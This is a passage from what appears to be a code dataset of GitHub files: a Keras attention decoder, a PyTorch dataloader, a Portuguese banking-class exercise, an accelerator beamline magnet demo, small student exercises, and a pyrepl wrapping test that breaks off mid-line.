RepeatVector(1)(c)\n return c\n \n \n [h,s] = initial_state\n if self.context_mode == 'att':\n context = attention([h,s],0)\n elif self.context_mode == 'mean':\n context = meancontext()\n elif self.context_mode == 'last':\n context = lastcontext()\n \n outputs =[]\n prev = None\n for t in range(self.predT):\n if not self.trainmode and t > 0 and prev is not None:\n #if decoder length is larger than 1, we calculate the prediction output for current step\n last_pred = self.Wo(prev)\n else:\n last_pred = Lambda(lambda x: x[:,t ,:], name = 'X_tem{}'.format(t))(last_inputs) #[none,decoder_input_dim]\n last_pred = RepeatVector(1)(last_pred) #[none,1,decoder_input_dim] , 1 denotes one time step\n \n x = Concatenate(axis = -1)([context,last_pred])\n o, h, s = self.deLSTM(x, initial_state = [h, s])\n if self.context_mode == 'att':\n context = attention([h,s],t+1)#[none, 1, latent_dim]\n o = 
RepeatVector(1)(o)\n outputs.append(o)\n prev = o\n \n if len(outputs) > 1:\n outputs = Concatenate(axis = 1, name = 'decoder_output')(outputs)\n else:\n outputs = tf.convert_to_tensor(outputs[0])\n \n print(outputs)\n return outputs,[h,s]\n \n \n def build_model(self, input_dim = 5):\n #encoder\n encoder_latent_dim = self.encoder_latent_dim\n neighnum = self.neigh_num\n T = self.T\n h0 = Input(shape = (encoder_latent_dim,),name = 'h_initial')\n s0 = Input(shape = (encoder_latent_dim,),name = 's_initial')\n enc_att_local = Input(shape = (1,input_dim),name = 'enc_att_local')\n enc_att_global = Input(shape = (1,neighnum),name = 'enc_att_global')\n encoder_inputs_local = Input(shape = (T,input_dim), name = 'encoder_input_local')\n encoder_inputs_global_value = Input(shape = (T, neighnum), name = 'encoder_input_global_value')\n encoder_inputs_global_weight = Input(shape = (T, neighnum), name = 'encoder_input_global_weight')\n if self.global_att:\n encoder_inputs = [encoder_inputs_local,[encoder_inputs_global_value,encoder_inputs_global_weight]]\n enc_att = [enc_att_local,enc_att_global]\n else:\n encoder_inputs = encoder_inputs_local\n enc_att = enc_att_local\n encoder_output, encoder_state, encoder_att = self.encoder_attention(encoder_inputs,enc_att,[h0, s0])\n \n #decoder\n dim = 1\n last_inputs = Input(shape = (None, dim))\n decoder_inputs = last_inputs\n decoder_outputs, states = self.decoder_attention(decoder_inputs, encoder_state, encoder_output)\n \n #linear transform\n output = self.Wo(decoder_outputs)\n model = Model([encoder_inputs_local, encoder_inputs_global_value,encoder_inputs_global_weight, h0, s0, enc_att_local, enc_att_global, last_inputs], output)\n \n return model\n","repo_name":"Elliebababa/Multi-Attention-Spatiotemporal-Network-for-mobile-traffic-prediction","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":17884,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"19777914554","text":"import torch\nimport torch.utils.data as Data\nimport os\nimport pdb\nimport pandas as pd\nimport numpy as np\nimport config\nimport matplotlib.pyplot as plt\n\nprint(\"Begin dataloading.py\")\n\nclass GeneDataset(Data.Dataset):\n def __init__(self, features, labels,\n label_idx_to_str, label_str_to_idx):\n super(GeneDataset, self).__init__()\n self.features = features\n self.labels = labels\n self.label_idx_to_str = label_idx_to_str\n self.label_str_to_idx = label_str_to_idx\n\n def __getitem__(self, index):\n # change behavior for np.array rather than pd DataFrame\n if isinstance(self.features, np.ndarray):\n feature = self.features[index,:]\n else:\n feature = self.features.iloc[index,:]\n\n label_str = self.labels[index]\n label_idx = self.label_str_to_idx[label_str]\n\n return np.array(feature), label_idx\n\n def __len__(self):\n return self.features.shape[0]\n\n\n################\n### DATASETS ###\n################\ndef get_dataset(is_train):\n # we have to get the labels from the HDFStore as before\n # but now we need to get the features from a numpy array\n # that Jakob is saving which is the result of the gOMP\n if is_train:\n store = pd.HDFStore(config.TRAIN_DATA_PATH)\n feature_array = config.TRAIN_DATA_NP_ARRAY \n else:\n store = pd.HDFStore(config.TEST_DATA_PATH)\n feature_array = config.TEST_DATA_NP_ARRAY\n\n # features = store['rpkm'] # (21389, 20499)\n labels = store['labels'] # (21389,)\n\n features = np.load(feature_array)\n\n\n return GeneDataset(features, labels,\n 
label_idx_to_str, label_str_to_idx)\n\n# the labels mapping from index to string is based on all the data\nstore = pd.HDFStore(config.DATA_PATH + \"all_data.h5\")\nlabels = store['labels']\nuniques = np.sort(np.unique(labels))\nlabel_idx_to_str = dict()\nlabel_str_to_idx = dict()\nlabel_order = []\nfor idx, label_str in enumerate(uniques): # renamed from 'str' to avoid shadowing the builtin\n label_order.append(label_str)\n label_idx_to_str[idx] = label_str\n label_str_to_idx[label_str] = idx\n\nlabel_order_array = np.array(label_order)\nnp.save('labels_in_order.npy', label_order_array)\nprint('labels saved')\n\ntrain_dataset = get_dataset(is_train=True)\ntrain_loader = Data.DataLoader(train_dataset,\n batch_size = config.BATCH_SIZE,\n shuffle = True,\n drop_last = True)\n\ntest_dataset = get_dataset(is_train=False)\ntest_loader = Data.DataLoader(test_dataset,\n batch_size = config.BATCH_SIZE)\n\nprint(\"dataloading.py done!\")\n","repo_name":"DavidLBick/Single-Cell-RNA-Sequencing","sub_path":"dataloading.py","file_name":"dataloading.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30331451675","text":"class Cliente:\n def __init__(self, nome, sobrenome, cpf):\n self.nome = nome\n self.sobrenome = sobrenome\n self.cpf = cpf\n\n\nclass Data:\n def __init__(self, dia, mes, ano):\n self.dia = dia\n self.mes = mes\n self.ano = ano\n\n\nclass Historico:\n def __init__(self, data_abertura):\n self.data_abertura = data_abertura\n self.transacoes = []\n\n def registrar_transacao(self, transacao):\n self.transacoes.append(transacao)\n\n def imprime(self):\n print(f'Data de abertura da conta: {self.data_abertura.dia}/{self.data_abertura.mes}/{self.data_abertura.ano}')\n for transacao in self.transacoes:\n print(transacao)\n\n\nclass Conta:\n def __init__(self, numero, cliente, limite=0.0):\n self.numero = numero\n self.saldo = 0.0\n self.limite = limite\n self.cliente = cliente\n self.historico = Historico(Data(1, 1, 2022))\n\n def deposita(self, valor, data=None):\n if valor > 0:\n self.saldo += valor\n transacao = f'{data.dia}/{data.mes}/{data.ano} - Depósito: R$ {valor:.2f}'\n self.historico.registrar_transacao(transacao)\n return True\n return False\n\n def saca(self, valor, data=None):\n if valor <= self.saldo + self.limite:\n # withdraw from the balance first; only the excess consumes the credit limit\n # (the original version zeroed the balance and corrupted the limit on every withdrawal)\n if valor <= self.saldo:\n self.saldo -= valor\n else:\n self.limite -= (valor - self.saldo)\n self.saldo = 0\n transacao = f'{data.dia}/{data.mes}/{data.ano} - Saque: R$ {valor:.2f}'\n self.historico.registrar_transacao(transacao)\n return True\n return False\n\n def transfere_para(self, destino, valor, data=None):\n if valor <= self.saldo + self.limite:\n # debit the source account (this step was missing in the original)\n if valor <= self.saldo:\n self.saldo -= valor\n else:\n self.limite -= (valor - self.saldo)\n self.saldo = 0\n destino.deposita(valor, data)\n transacao = f'{data.dia}/{data.mes}/{data.ano} - Transferência para conta {destino.numero}: R$ {valor:.2f}'\n self.historico.registrar_transacao(transacao)\n return True\n return False\n\n def extrato(self):\n print(f'Número da conta: {self.numero}')\n print(f'Cliente: {self.cliente.nome} {self.cliente.sobrenome}')\n print(f'Saldo: R$ {self.saldo:.2f}')\n print(f'Limite: R$ {self.limite:.2f}')\n self.historico.imprime()\n\n def calcula_juros(self, taxa, data=None):\n juros = (self.saldo + abs(self.limite)) * (taxa / 100)\n self.saldo -= juros\n transacao = f'{data.dia}/{data.mes}/{data.ano} - Cálculo de juros: R$ {juros:.2f}'\n self.historico.registrar_transacao(transacao)\n\n'''EXAMPLES: '''\n\ncliente1 = Cliente(\"Wagner\", \"Moura\", \"123456789\")\nconta1 = Conta(\"0123456\", cliente1, limite=5000)\nconta2 = Conta(\"0123457\",cliente1,limite=3000)\n\ndata_deposito = Data(10, 3, 
2022)\nconta1.deposita(1000, data_deposito)\n\ndata_saque = Data(15, 3, 2022)\nconta1.saca(3000, data_saque)\n\ndata_transferencia = Data(1, 10,2023)\nconta1.transfere_para(conta2, 2000, data_transferencia) # the transfer described in the closing comment below (the call was missing from the script)\n\nconta1.extrato()\n\n'''This creates a client named Wagner Moura, CPF 123456789, and an account numbered \"0123456\"\nwith a limit of R$ 5000. A deposit of R$ 1000 is then made on 10/03/2022,\nfollowed by a withdrawal of R$ 3000 on 15/03/2022, and then a transfer of R$ 2000 on 1/10/2023 to another account of the same client.\nFinally, the account statement is printed with all recorded transactions.'''\n\n\n","repo_name":"wagnerbmoura/PycharmProjects","sub_path":"SI UFPI /Programação II - Orientada a Objetos/Q1_Trabalaho01_Alg_Programação_II.py","file_name":"Q1_Trabalaho01_Alg_Programação_II.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72963646913","text":"\"\"\"\nCCT modeling and optimization code\nA15 beamline example\n\n\nAuthor: Zhao Runxiao\nDate: May 2, 2021\n\"\"\"\n\nfrom os import error, path\nimport sys\nsys.path.append(path.dirname(path.abspath(path.dirname(__file__))))\n\nfrom cctpy import *\n\n\n\n\n# Beamline represents a section of a beamline; it consists of a Line2 and several Magnets,\n# so it can be viewed both as a 2D directed curve segment and as a magnet\n\n\nif __name__ == \"__main__\":\n BaseUtils.i_am_sure_my_code_closed_in_if_name_equal_main()\n\n\n # builder\n traj = (\n Trajectory.set_start_point(P2(1,1))\n .first_line(direct=P2.y_direct(),length=1)\n .add_arc_line(radius=0.05,clockwise=True,angle_deg=90)\n .add_strait_line(1)\n .add_arc_line(radius=0.05,clockwise=True,angle_deg=90)\n .add_strait_line(1)\n .add_arc_line(radius=0.05,clockwise=True,angle_deg=90)\n .add_strait_line(0.5)\n )\n bl = Beamline(traj)\n # Plot2.plot_beamline(bl)\n # Plot2.equal()\n # Plot2.show()\n\n print(bl.magnetic_field_at(P3.random()))\n # (0.0, 0.0, 0.0)\n\n print(bl.is_out_of_aperture(P3.random()))\n # False\n\n print(bl.get_length()) # 3.7356194490192345\n print(bl.point_at(0)) # (1.0, 1.0)\n print(bl.point_at(1)) # (1.0, 2.0)\n print(bl.direct_at(0)) # (0.0, 1.0)\n print(bl.direct_at(1)) # (0.0, 1.0)\n\n bl = Beamline.set_start_point(P2(1,2)).first_drift(direct=P2(1,1),length=1)\n # Plot2.plot_beamline(bl)\n # Plot2.equal()\n # Plot2.info()\n # Plot2.show()\n\n bl.append_q(\n length=0.27,\n gradient=0.5,\n aperture_radius=100*MM\n )\n bl.append_drift(1.0)\n # Plot2.plot_beamline(bl)\n # Plot2.equal() # equal scaling of the x and y axes\n # Plot2.info() # font size set to 24\n # Plot2.show()\n\n bl.append_qs(\n length=0.5,\n gradient=0.5,\n second_gradient=0.0,\n aperture_radius=50*MM\n )\n bl.append_drift(2.0)\n # Plot2.plot_beamline(bl)\n # Plot2.equal() # equal scaling of the x and y axes\n # Plot2.info() # font size set to 24\n # Plot2.show()\n\n bl.append_dipole_cct(\n big_r=1.0,\n small_r_inner=100*MM,\n small_r_outer=150*MM,\n bending_angle=-45,\n tilt_angles=[30],\n winding_number=45,\n current=10000\n )\n bl.append_drift(2.0)\n # Plot2.plot_beamline(bl)\n # Plot2.equal() # equal scaling of the x and y axes\n # Plot2.info() # font size set to 24\n # Plot2.show()\n\n bl.append_agcct(\n big_r=3.0,\n small_rs=[200*MM,180*MM,160*MM,140*MM],\n bending_angles=[60,60,60],\n tilt_angles=[\n [30,80,90,80],\n [80,30,95,105,90,100]\n ],\n winding_numbers=[\n [120],\n [30,30,30]\n ],\n currents=[8000,-10000]\n )\n bl.append_drift(3.0)\n # Plot2.plot_beamline(bl)\n # Plot2.equal() # equal scaling of the x and y axes\n # Plot2.info() # font size set to 24\n # Plot2.show()\n\n magnets = bl.get_magnets()\n for magnet in magnets:\n print(magnet)\n # Q:local_coordinate_system=LOCATION=(1.7071067811865475, 2.7071067811865475, 0.0), xi=(-0.7071067811865476, 
0.7071067811865476, 0.0), yi=(0.0, -0.0, 1.0000000000000002), zi=(0.7071067811865476, 0.7071067811865476, 0.0), length=0.27, gradient=0.5, aperture_radius=0.1\n # QS:local_coordinate_system=LOCATION=(2.605132393293463, 3.605132393293463, 0.0), xi=(-0.7071067811865476, 0.7071067811865476, 0.0), yi=(0.0, -0.0, 1.0000000000000002), zi=(0.7071067811865476, 0.7071067811865476, 0.0), length=0.5, gradient=0.5, second_gradient=0.0, aperture_radius=0.05\n # CCT: local_coordinate_system(LOCATION=(5.0800061274463895, 4.6657925650732235, 0.0), xi=(-0.7071067811865476, 0.7071067811865476, 0.0), yi=(-0.7071067811865476, -0.7071067811865476, 0.0), zi=(0.0, 0.0, 1.0))big_r(1.0)small_r(0.1)bending_angle(45.0)tilt_angles([30.0])winding_number(45)current(10000.0)starting_point_in_ksi_phi_coordinate((0.0, 0.0))end_point_in_ksi_phi_coordinate((282.7433388230814, -0.7853981633974483))disperse_number_per_winding(120)\n\n\n bl = HUST_SC_GANTRY().create_first_bending_part_beamline()\n # track = bl.track_ideal_particle(\n # kinetic_MeV=215,\n # s = 0,\n # footstep=20*MM\n # )\n # Plot3.plot_beamline(bl)\n # Plot3.plot_p3s(track,describe='k-')\n # Plot3.set_center(center=bl.point_at_middle().to_p3(),cube_size=8)\n # Plot3.show()\n\n phase_space_particle_with_distance = bl.track_phase_space_particle(\n x_mm=3.5,xp_mrad=0.0,\n y_mm=0,yp_mrad=0,\n delta=0,kinetic_MeV=215,\n s=0,footstep=20*MM\n )\n # track_in_x_plane = [\n # P2(pd.distance,pd.value.x)\n # for pd in phase_space_particle_with_distance\n # ]\n # Plot2.plot_p2s(track_in_x_plane)\n # Plot2.plot_beamline_straight(bl)\n # Plot2.show()\n\n # sx, sy = bl.track_phase_ellipse(\n # x_sigma_mm=3.5,\n # xp_sigma_mrad=7.5,\n # y_sigma_mm=3.5,\n # yp_sigma_mrad=7.5,\n # delta=0.01,\n # particle_number=8,\n # kinetic_MeV=215,\n # concurrency_level=16\n # )\n # Plot2.plot_p2s(sx,circle=True,describe='r-')\n # Plot2.plot_p2s(sy,circle=True,describe='k-')\n # Plot2.equal()\n # Plot2.info(\"mm\",\"mrad\")\n # Plot2.legend(\"x_plane\",\"y_plane\")\n # Plot2.show()\n\n print(bl)\n print(bl.__str__())\n print(bl.__repr__())\n\n # below, a superconducting gantry is used as an example of how to work with Beamline\n #------------------ front bending section ---------------#\n # drift sections, comprising DL1 GAP1 GAP2\n DL1 = 0.8001322\n GAP1 = 0.1765959\n GAP2 = 0.2960518\n # qs magnets: two qs magnets, qs1 and qs2, each defined by length, aperture, gradient and second-order gradient\n qs1_length = 0.2997797\n qs1_aperture_radius = 30 * MM\n qs1_gradient = 28.33\n qs1_second_gradient = -140.44 * 2.0\n qs2_length = 0.2585548\n qs2_aperture_radius = 30 * MM\n qs2_gradient = -12.12\n qs2_second_gradient = 316.22 * 2.0\n # cct bending radius\n cct12_big_r = 0.95\n # cct apertures; there are four CCT layers, hence four values\n agcct12_inner_small_r = 35 * MM\n agcct12_outer_small_r = 35 * MM + 15 * MM\n dicct12_inner_small_r = 35 * MM + 15 * MM * 2\n dicct12_outer_small_r = 35 * MM + 15 * MM * 3\n # cct winding numbers: the two alternating-gradient agcct segments and the bending dipole dicct\n agcct1_winding_number = 30\n agcct2_winding_number = 39\n dicct12_winding_number = 71\n # cct angles (bending angles)\n dicct12_bending_angle = 22.5\n agcct1_bending_angle = 9.782608695652174\n agcct2_bending_angle = 12.717391304347826 # agcct1_bending_angle + agcct2_bending_angle = dicct12_bending_angle\n # cct tilt angles (a tilt angle of 90 degrees means no tilt)\n dicct12_tilt_angles = [30, 80]\n agcct12_tilt_angles = [90, 30]\n # cct currents\n dicct12_current = -6192\n agcct12_current = -3319\n #------------------ rear bending section ---------------#\n # drift sections\n DL2 = 2.1162209\n GAP3 = 0.1978111\n # qs magnet\n qs3_length = 0.2382791\n qs3_aperture_radius = 60 * MM\n qs3_gradient = -7.3733\n qs3_second_gradient = -45.31 * 2\n # cct bending radius\n cct345_big_r = 0.95\n # cct apertures\n agcct345_inner_small_r = 83 * MM\n 
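# note (added): each successive coil layer's bore radius grows in 15 mm steps, from the\n # innermost agcct layer out to the outermost dicct layer, so the four layers nest cleanly\n 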
agcct345_outer_small_r = 83 * MM + 15 * MM\n dicct345_inner_small_r = 83 * MM + 15 * MM * 2\n dicct345_outer_small_r = 83 * MM + 15 * MM * 3\n # cct winding numbers\n agcct3_winding_number = 21\n agcct4_winding_number = 50\n agcct5_winding_number = 50\n dicct345_winding_number = 128\n # cct angles (negative values mean clockwise bending)\n dicct345_bending_angle = -67.5\n agcct3_bending_angle = -(8 + 3.716404)\n agcct4_bending_angle = -(8 + 19.93897)\n agcct5_bending_angle = -(8 + 19.844626)\n # cct tilt angles (a tilt angle of 90 degrees means no tilt)\n dicct345_tilt_angles = [30, 80]\n agcct345_tilt_angles = [90, 30]\n # cct currents\n dicct345_current = 9664\n agcct345_current = -6000\n\n # number of discrete current elements per CCT winding, set to 36\n part_per_winding = 36\n\n\n #------------------ building the beamline with Beamline ---------------#\n #------------------ front bending section ---------------#\n beamline = (\n Beamline.set_start_point(P2.origin()) # set the start point of the beamline\n .first_drift(direct=P2.x_direct(), length=DL1) # set the first drift section (a beamline must begin with a drift)\n .append_agcct( # append an agcct\n big_r=cct12_big_r, # bending radius\n # apertures of the dipole CCT and the quadrupole CCT\n small_rs=[dicct12_outer_small_r,dicct12_inner_small_r,agcct12_outer_small_r,agcct12_inner_small_r],\n bending_angles=[agcct1_bending_angle,agcct2_bending_angle], # bending angle of each agcct segment\n tilt_angles=[dicct12_tilt_angles,agcct12_tilt_angles], # tilt angles of the dipole CCT and the quadrupole CCT\n winding_numbers=[[dicct12_winding_number],[agcct1_winding_number,agcct2_winding_number]], # winding numbers of the dipole CCT and the quadrupole CCT\n currents=[dicct12_current,agcct12_current], # currents of the dipole CCT and the quadrupole CCT\n disperse_number_per_winding=part_per_winding # number of segments per winding\n )\n .append_drift(GAP1) # append a drift section\n .append_qs( # append a QS magnet\n length=qs1_length,\n gradient=qs1_gradient,\n second_gradient=qs1_second_gradient,\n aperture_radius=qs1_aperture_radius\n )\n .append_drift(GAP2)\n .append_qs(\n length=qs2_length,\n gradient=qs2_gradient,\n second_gradient=qs2_second_gradient,\n aperture_radius=qs2_aperture_radius\n )\n .append_drift(GAP2)\n .append_qs(\n length=qs1_length,\n gradient=qs1_gradient,\n second_gradient=qs1_second_gradient,\n aperture_radius=qs1_aperture_radius\n )\n .append_drift(GAP1)\n .append_agcct(\n big_r=cct12_big_r,\n small_rs=[dicct12_outer_small_r,dicct12_inner_small_r,agcct12_outer_small_r,agcct12_inner_small_r],\n bending_angles=[agcct2_bending_angle,agcct1_bending_angle],\n tilt_angles=[dicct12_tilt_angles,agcct12_tilt_angles],\n winding_numbers=[[dicct12_winding_number],[agcct2_winding_number,agcct1_winding_number]],\n currents=[dicct12_current,agcct12_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(DL1)\n )\n\n # beamline length\n beamline_length_part1 = beamline.get_length()\n print(f\"front bending section length: {beamline_length_part1} m\")\n\n # plot the front bending section\n # Plot2.equal()\n # Plot2.plot(beamline)\n # Plot2.show()\n\n #------------------ rear bending section ---------------#\n beamline = (\n beamline.append_drift(DL2)\n .append_agcct(\n big_r=cct345_big_r,\n small_rs=[dicct345_outer_small_r,dicct345_inner_small_r,agcct345_outer_small_r,agcct345_inner_small_r],\n bending_angles=[agcct3_bending_angle,agcct4_bending_angle,agcct5_bending_angle],\n tilt_angles=[dicct345_tilt_angles,agcct345_tilt_angles],\n winding_numbers=[[dicct345_winding_number], [agcct3_winding_number,agcct4_winding_number,agcct5_winding_number]],\n currents=[dicct345_current,agcct345_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(GAP3)\n .append_qs(\n length=qs3_length,\n gradient=qs3_gradient,\n second_gradient=qs3_second_gradient,\n aperture_radius=qs3_aperture_radius\n )\n .append_drift(GAP3)\n .append_agcct(\n big_r=cct345_big_r,\n 
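# note (added): this is the mirrored second half of the rear section; it reuses the same\n # four bore radii while the segment order below is reversed (agcct5, agcct4, agcct3)\n 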
small_rs=[dicct345_outer_small_r,dicct345_inner_small_r,agcct345_outer_small_r,agcct345_inner_small_r],\n bending_angles=[agcct5_bending_angle,agcct4_bending_angle,agcct3_bending_angle],\n tilt_angles=[dicct345_tilt_angles,agcct345_tilt_angles],\n winding_numbers=[[dicct345_winding_number], [agcct5_winding_number,agcct4_winding_number,agcct3_winding_number]],\n currents=[dicct345_current,agcct345_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(DL2)\n )\n\n beamline_length = beamline.get_length()\n print(f\"total beamline length: {beamline_length} m\")\n\n # plot the rear bending section\n # Plot2.equal()\n # Plot2.plot(beamline)\n # Plot2.show()\n\n #------------------ define the beam, run particle tracking, and plot the phase ellipses ---------------#\n\n # set the beam parameters and run the particle tracking\n # returns a length-2 tuple holding the particle projections on the x-xp and y-yp phase-space planes\n xxp,yyp = beamline.track_phase_ellipse(\n x_sigma_mm=3.5,\n xp_sigma_mrad=7.5,\n y_sigma_mm=3.5,\n yp_sigma_mrad=7.5,\n delta=0.0,\n particle_number=6, # number of particles\n kinetic_MeV=215,\n s=beamline_length_part1, # beam start position, set to beamline_length_part1, i.e. the start of the rear bending section\n footstep=20*MM, # particle tracking step size\n concurrency_level=16\n )\n\n # Plot2.info(x_label='x/mm',y_label='xp/mrad',title='x-xp')\n # Plot2.plot(xxp,describe='bo')\n # Plot2.show()\n\n # Plot2.info(x_label='y/mm',y_label='yp/mrad',title='y-yp')\n # Plot2.plot(yyp,describe='bo')\n # Plot2.show()\n\n\n # inspect the magnetic field distribution along the beamline\n b = beamline.magnetic_field_bz_along(step=20*MM)\n # Plot2.plot(b,describe='r-')\n # Plot2.show()\n\n # ------------------------------ a brief overview of the Beamline methods --------------------- #\n\n # Beamline is a subclass of the three classes Line2, Magnet and ApertureObject,\n # so the methods of all three parent classes can be used on a Beamline object, e.g. magnetic_field_at()\n\n # calling the constructor Beamline() directly is not recommended\n # it takes a Line2 object to serve as the design orbit trajectory\n # after construction there is no magnetic field on the orbit\n\n # Magnet-related methods\n # magnetic_field_along\n # magnetic_field_bz_along\n # graident_field_along\n # second_graident_field_along\n\n # ApertureObject-related methods\n # is_out_of_aperture\n # trace_is_out_of_aperture newly added method that checks whether a trajectory (a P3 array) leaves the aperture\n\n # Line2-related methods\n # get_length\n # point_at\n # direct_at\n\n\n # the track_ideal_particle method tracks an ideal particle\n # parameters:\n # kinetic_MeV particle kinetic energy, in MeV\n # s start position, measured as distance s from the beamline start. Default 0, i.e. the start of the beamline\n # length distance travelled. By default the particle runs to the end of the beamline\n # footstep tracking step size, default 5*MM\n # returns the particle trajectory as a P3 array\n track_ideal_p = beamline.track_ideal_particle(kinetic_MeV=215)\n # Plot3.plot_beamline(beamline)\n # Plot3.plot_p3s(track_ideal_p)\n # Plot3.show()\n\n\n # the track_phase_ellipse() method performs beam tracking, running one phase ellipse\n # it returns a length-2 tuple\n # whose elements are the particle projections on the x-xp and y-yp phase-space planes (units mm / mrad), each a P2 array\n # parameters:\n # x_sigma_mm σx in mm\n # xp_sigma_mrad σxp in mrad\n # y_sigma_mm σy in mm\n # yp_sigma_mrad σyp in mrad\n # delta momentum spread, dimensionless\n # particle_number number of particles\n # kinetic_MeV kinetic energy in MeV\n # s start position\n # length tracking distance, by default to the end of the beamline\n # footstep particle tracking step size\n # concurrency_level concurrency level (how many cores are used for the tracking)\n # report whether to print the parallel task plan\n \n xxp,yyp = beamline.track_phase_ellipse(\n x_sigma_mm=3.5,\n xp_sigma_mrad=7.5,\n y_sigma_mm=3.5,\n yp_sigma_mrad=7.5,\n delta=0.0,\n particle_number=6, # number of particles\n kinetic_MeV=250,\n s = 0,\n length=beamline_length_part1,\n footstep=20*MM, # particle tracking step size\n concurrency_level=16\n )\n\n # Plot2.plot_p2s(xxp,describe='r.')\n # Plot2.plot_p2s(yyp,describe='b.')\n # Plot2.show()\n\n # the inner class __BeamlineBuilder makes it convenient to build a beamline\n # the steps for building one are:\n # step 1: specify the start point\n beamline = Beamline.set_start_point(P2.origin())\n # step 2: set the first drift section, giving its direction and length\n beamline = beamline.first_drift(direct=P2.x_direct(),length=1)\n # step 3: keep appending elements, which can be any of the four kinds below\n # append_drift\n # append_qs\n # append_dipole_cct\n # append_agcct\n # each is introduced below\n\n # the append_drift method appends a drift section\n # its only parameter is length, the length of the drift\n\n 
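# (added sketch, not in the original demo) a minimal chain combining these builder calls,\n # reusing parameters already defined above:\n # bl2 = (Beamline.set_start_point(P2.origin())\n # .first_drift(direct=P2.x_direct(), length=1.0)\n # .append_drift(0.5)\n # .append_qs(length=qs3_length, gradient=qs3_gradient, second_gradient=qs3_second_gradient, aperture_radius=qs3_aperture_radius))\n\n 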
# the append_qs method appends a qs magnet\n # parameters:\n # length: float QS magnet length\n # gradient: float gradient, T/m\n # second_gradient: float second-order gradient (sextupole field), T/m^2\n # aperture_radius: float aperture radius, in m\n\n # the append_dipole_cct method appends a dipole CCT magnet\n # parameters:\n # big_r: float bending radius\n # small_r_inner: float inner-layer aperture radius\n # small_r_outer: float outer-layer aperture radius\n # bending_angle: float bending angle (positive = counterclockwise, negative = clockwise)\n # tilt_angles: List[float] tilt angle of each multipole order\n # winding_number: int number of windings\n # current: float current\n # disperse_number_per_winding: int segments per winding; the larger, the more accurate the computation\n\n # the append_agcct method appends a quadrupole (alternating-gradient) CCT magnet\n # parameters:\n # big_r: float bending radius, in m\n # small_rs: List[float] apertures of the CCT layers, four in total, in descending order: dipole CCT outer and inner layer, then quadrupole CCT outer and inner layer\n # bending_angles: List[float] bending angle of each part of the alternating quadrupole CCT (positive = counterclockwise, negative = clockwise); either all positive or all negative. The dipole CCT bending angle is not passed in, since it is just sum(bending_angles)\n # tilt_angles: List[List[float]] tilt angles of the dipole CCT and the quadrupole CCT, typical value [[30],[90,30]]; a 2D array with exactly two elements\n # winding_numbers: List[List[int]], winding numbers of the dipole CCT and the quadrupole CCT; the typical value [[128],[21,50,50]] means 128 windings for the dipole CCT and 21, 50 and 50 for the alternating quadrupole CCT\n # currents: List[float] currents of the dipole CCT and the quadrupole CCT, typical value [8000,9000]\n # disperse_number_per_winding: int segments per winding; the larger, the more accurate the computation\n\n\n\n\n # the __str__ method converts the beamline to a string\n print(beamline) # beamline(magnet_size=0, traj_len=1.0)\n","repo_name":"madokast/cctpy","sub_path":"final_code/demos/A15束线beamline示例.py","file_name":"A15束线beamline示例.py","file_ext":"py","file_size_in_byte":18414,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8146696113","text":"import math\nn = int(input(\"n = \"))\na = [float(input(\"a[{0}] = \".format(i))) for i in range(n)]\nprint(\"Array a = {0}\".format(a))\n# stable partition: elements with |a[i]| <= 1 first, the rest after, original order preserved\nb = []\nc = []\nfor i in range(len(a)):\n if math.fabs(a[i]) <= 1:\n b.append(a[i])\n else:\n c.append(a[i])\nb += c\na = b\nprint(\"Transformed array a = {0}\".format(a))","repo_name":"KYUUBI-K/Labs-from-python","sub_path":"Лаб.6/завдання 4.py","file_name":"завдання 4.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38351318205","text":"import math\n\n\ndef main(n):\n if n == 0:\n return -0.12\n elif n >= 1:\n # note: main(n - 1) is evaluated three times here, so the naive recursion is exponential in n\n return main(n - 1) - 63 * (math.cos(1 - (main(n - 1)) ** 3 / 81 - (main(n - 1)) ** 2)) ** 2\n return 0\n\n\ndef main2(n):\n # iterative version: computes each term exactly once, so it runs in linear time\n res = []\n res.append(-0.12)\n for i in range(1, n + 1):\n temp = res[i - 1]\n res.append(temp - 63 * (math.cos(1 - temp ** 3 / 81 - temp ** 2)) ** 2)\n return res[n]\n\nprint(main(2) == main2(2))\nprint(main(8) == main2(8))\nprint(main(2))\nprint(main(8))","repo_name":"IvanCherepanov/kispython","sub_path":"fourth.py","file_name":"fourth.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"25246902445","text":"\nimport time\nimport unittest\n\nimport gobject\nimport vte\n\nimport pyrepl.reader\nimport pyrepl.unix_console\n\n\nclass TestWrappingLongLines(unittest.TestCase):\n\n # Test that Reader wraps lines correctly before passing them to\n # UnixConsole.\n\n def make_example_reader(self):\n console = pyrepl.unix_console.UnixConsole()\n reader = pyrepl.reader.Reader(console)\n reader.ps1 = \"foo$\"\n reader.prepare()\n reader.restore() # Don't screw up terminal\n reader.console.width = 10\n reader.buffer = list(\"01234567890123456789\")\n return reader\n\n def check_output(self, reader, lines):\n for line in lines:\n assert len(line) <= reader.console.width\n # Check cursor position consistency.\n for index, char in enumerate(\"\".join(reader.buffer)):\n x, y = reader.pos2xy(index)\n self.assertEquals(lines[y][x], 
